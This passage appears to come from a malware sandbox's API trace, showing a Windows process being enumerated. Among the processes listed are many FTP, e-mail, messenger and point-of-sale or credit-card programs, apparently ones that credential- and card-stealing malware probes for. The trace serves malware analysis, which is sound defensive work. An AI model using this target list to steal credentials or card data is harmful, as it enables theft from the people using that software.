th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="whose.exe")) returned 1 [0237.456] Process32Next (in: hSnapshot=0x1b08, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xe80, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="3dftp.exe")) returned 1 [0237.457] Process32Next (in: hSnapshot=0x1b08, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xe88, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="absolutetelnet.exe")) returned 1 [0237.458] Process32Next (in: hSnapshot=0x1b08, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xe94, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="alftp.exe")) returned 1 [0237.460] Process32Next (in: hSnapshot=0x1b08, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xe9c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="barca.exe")) returned 1 [0237.461] Process32Next (in: hSnapshot=0x1b08, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xeb0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="bitkinex.exe")) returned 1 [0237.462] Process32Next (in: hSnapshot=0x1b08, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xeb8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="coreftp.exe")) returned 1 [0237.464] Process32Next (in: hSnapshot=0x1b08, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xec4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="far.exe")) returned 1 [0237.466] Process32Next (in: hSnapshot=0x1b08, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xecc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="filezilla.exe")) returned 1 [0237.468] Process32Next (in: hSnapshot=0x1b08, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xed4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="flashfxp.exe")) returned 1 [0237.469] Process32Next (in: hSnapshot=0x1b08, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xedc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="fling.exe")) returned 1 [0237.471] Process32Next (in: hSnapshot=0x1b08, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf04, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="foxmailincmail.exe")) returned 1 [0237.473] Process32Next (in: hSnapshot=0x1b08, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf0c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="gmailnotifierpro.exe")) returned 1 [0237.474] Process32Next (in: hSnapshot=0x1b08, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf14, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="icq.exe")) returned 1 [0237.476] Process32Next (in: hSnapshot=0x1b08, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf1c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="leechftp.exe")) returned 1 [0237.478] Process32Next (in: hSnapshot=0x1b08, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf30, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="ncftp.exe")) returned 1 [0237.545] Process32Next (in: hSnapshot=0x1b08, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf38, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="notepad.exe")) returned 1 [0237.547] Process32Next (in: hSnapshot=0x1b08, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf4c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="operamail.exe")) returned 1 [0237.548] Process32Next (in: hSnapshot=0x1b08, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf54, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="outlook.exe")) returned 1 [0237.550] Process32Next (in: hSnapshot=0x1b08, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf60, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="pidgin.exe")) returned 1 [0237.552] Process32Next (in: hSnapshot=0x1b08, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf68, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="scriptftp.exe")) returned 1 [0237.553] Process32Next (in: hSnapshot=0x1b08, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf84, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="skype.exe")) returned 1 [0237.555] Process32Next (in: hSnapshot=0x1b08, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf8c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="smartftp.exe")) returned 1 [0237.556] Process32Next (in: hSnapshot=0x1b08, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf98, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="thunderbird.exe")) returned 1 [0237.558] Process32Next (in: hSnapshot=0x1b08, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xfa0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="trillian.exe")) returned 1 [0237.560] Process32Next (in: hSnapshot=0x1b08, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xfb0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="webdrive.exe")) returned 1 [0237.561] Process32Next (in: hSnapshot=0x1b08, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xfb8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="whatsapp.exe")) returned 1 [0237.563] Process32Next (in: hSnapshot=0x1b08, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xfd0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="winscp.exe")) returned 1 [0237.564] Process32Next (in: hSnapshot=0x1b08, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xfe0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="yahoomessenger.exe")) returned 1 [0237.566] Process32Next (in: hSnapshot=0x1b08, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xff4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="active-charge.exe")) returned 1 [0237.568] Process32Next (in: hSnapshot=0x1b08, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x878, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="accupos.exe")) returned 1 [0237.569] Process32Next (in: hSnapshot=0x1b08, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x858, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="afr38.exe")) returned 1 [0237.571] Process32Next (in: hSnapshot=0x1b08, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x7e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="aldelo.exe")) returned 1 [0237.572] Process32Next (in: hSnapshot=0x1b08, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xe54, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="ccv_server.exe")) returned 1 [0237.574] Process32Next (in: hSnapshot=0x1b08, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x660, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="centralcreditcard.exe")) returned 1 [0237.576] Process32Next (in: hSnapshot=0x1b08, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xb2c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="creditservice.exe")) returned 1 [0237.577] Process32Next (in: hSnapshot=0x1b08, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x72c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="edcsvr.exe")) returned 1 [0237.579] Process32Next (in: hSnapshot=0x1b08, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1004, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="fpos.exe")) returned 1 [0237.580] Process32Next (in: hSnapshot=0x1b08, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1014, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="isspos.exe")) returned 1 [0237.581] Process32Next (in: hSnapshot=0x1b08, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x101c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="mxslipstream.exe")) returned 1 [0237.583] Process32Next (in: hSnapshot=0x1b08, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x102c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="omnipos.exe")) returned 1 [0237.584] Process32Next (in: hSnapshot=0x1b08, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x103c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="spcwin.exe")) returned 1 [0237.586] Process32Next (in: hSnapshot=0x1b08, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1048, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="spgagentservice.exe")) returned 1 [0237.587] Process32Next (in: hSnapshot=0x1b08, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1054, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="utg2.exe")) returned 1 [0237.640] Process32Next (in: hSnapshot=0x1b08, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x108c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="discussion.exe")) returned 1 [0237.641] Process32Next (in: hSnapshot=0x1b08, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1094, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="styledesignbusiness.exe")) returned 1 [0237.643] Process32Next (in: hSnapshot=0x1b08, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x109c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="new_door.exe")) returned 1 [0237.644] Process32Next (in: hSnapshot=0x1b08, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x10b0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="bed fight.exe")) returned 1 [0237.645] Process32Next (in: hSnapshot=0x1b08, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x10b8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="federal hotel.exe")) returned 1 [0237.647] Process32Next (in: hSnapshot=0x1b08, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x10e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x274, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0237.648] Process32Next (in: hSnapshot=0x1b08, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x12e4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x390, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1 [0237.649] Process32Next (in: hSnapshot=0x1b08, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xc9c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x274, pcPriClassBase=8, dwFlags=0x0, szExeFile="backgroundTaskHost.exe")) returned 1 [0237.651] Process32Next (in: hSnapshot=0x1b08, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xc9c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x274, pcPriClassBase=8, dwFlags=0x0, szExeFile="backgroundTaskHost.exe")) returned 0 [0237.652] CloseHandle (hObject=0x1b08) returned 1 [0237.653] Sleep (dwMilliseconds=0x64) [0237.794] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x1b08 [0237.804] Process32First (in: hSnapshot=0x1b08, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0237.806] Process32Next (in: hSnapshot=0x1b08, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x73, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1 [0237.808] Process32Next (in: hSnapshot=0x1b08, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x138, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1 [0237.812] Process32Next (in: hSnapshot=0x1b08, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x184, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x17c, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0237.814] Process32Next (in: hSnapshot=0x1b08, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1c0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x17c, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1 [0237.815] Process32Next (in: hSnapshot=0x1b08, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1c8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x1b8, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0237.816] Process32Next (in: hSnapshot=0x1b08, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1fc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x1b8, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1 [0237.818] Process32Next (in: hSnapshot=0x1b08, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x214, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x10, th32ParentProcessID=0x1c0, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1 [0237.819] Process32Next (in: hSnapshot=0x1b08, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x21c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x1c0, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1 [0237.821] Process32Next (in: hSnapshot=0x1b08, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x274, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1b, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0237.822] Process32Next (in: hSnapshot=0x1b08, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x294, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0237.826] Process32Next (in: hSnapshot=0x1b08, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x30c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x1fc, pcPriClassBase=13, dwFlags=0x0, szExeFile="dwm.exe")) returned 1 [0237.828] Process32Next (in: hSnapshot=0x1b08, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x360, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x45, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0237.829] Process32Next (in: hSnapshot=0x1b08, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x378, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1b, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0237.831] Process32Next (in: hSnapshot=0x1b08, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x390, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x14, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0237.832] Process32Next (in: hSnapshot=0x1b08, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x3a0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0237.833] Process32Next (in: hSnapshot=0x1b08, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x3f4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1b, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0237.835] Process32Next (in: hSnapshot=0x1b08, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x210, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x11, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0237.836] Process32Next (in: hSnapshot=0x1b08, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x460, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x19, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0237.837] Process32Next (in: hSnapshot=0x1b08, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x4e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1 [0237.904] Process32Next (in: hSnapshot=0x1b08, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x54c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x360, pcPriClassBase=8, dwFlags=0x0, szExeFile="sihost.exe")) returned 1 [0237.905] Process32Next (in: hSnapshot=0x1b08, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x604, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x274, pcPriClassBase=8, dwFlags=0x0, szExeFile="RuntimeBroker.exe")) returned 1 [0237.907] Process32Next (in: hSnapshot=0x1b08, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x64c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0237.908] Process32Next (in: hSnapshot=0x1b08, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x7b4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2e, th32ParentProcessID=0x798, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0237.910] Process32Next (in: hSnapshot=0x1b08, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x7ec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x360, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhostw.exe")) returned 1 [0237.911] Process32Next (in: hSnapshot=0x1b08, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x894, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1d, th32ParentProcessID=0x274, pcPriClassBase=8, dwFlags=0x0, szExeFile="ShellExperienceHost.exe")) returned 1 [0237.912] Process32Next (in: hSnapshot=0x1b08, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x908, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1f, th32ParentProcessID=0x274, pcPriClassBase=8, dwFlags=0x0, szExeFile="SearchUI.exe")) returned 1 [0237.913] Process32Next (in: hSnapshot=0x1b08, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xbd0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x360, pcPriClassBase=8, dwFlags=0x0, szExeFile="WMIADAP.exe")) returned 1 [0237.915] Process32Next (in: hSnapshot=0x1b08, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xba8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0237.916] Process32Next (in: hSnapshot=0x1b08, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xad4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="sppsvc.exe")) returned 1 [0237.921] Process32Next (in: hSnapshot=0x1b08, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x670, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="iexplore.exe")) 